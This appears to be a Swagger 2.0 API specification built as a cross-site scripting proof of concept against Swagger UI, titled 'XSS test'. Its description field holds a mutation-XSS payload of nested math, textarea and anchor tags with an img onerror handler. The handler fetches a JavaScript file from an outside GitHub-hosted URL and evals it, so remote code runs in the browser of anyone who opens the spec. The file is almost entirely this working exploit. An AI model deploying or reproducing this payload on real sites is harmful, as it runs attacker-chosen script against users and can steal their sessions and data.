swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><textarea><a title="</textarea><img src='https://miro.medium.com/v2/format:webp/1%2AuNCVd_VqFOcdxhsL71cTQ.jpeg' onerror="fetch('https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/script.js').then(res => res.text()).then(eval)">'>">
  version: production
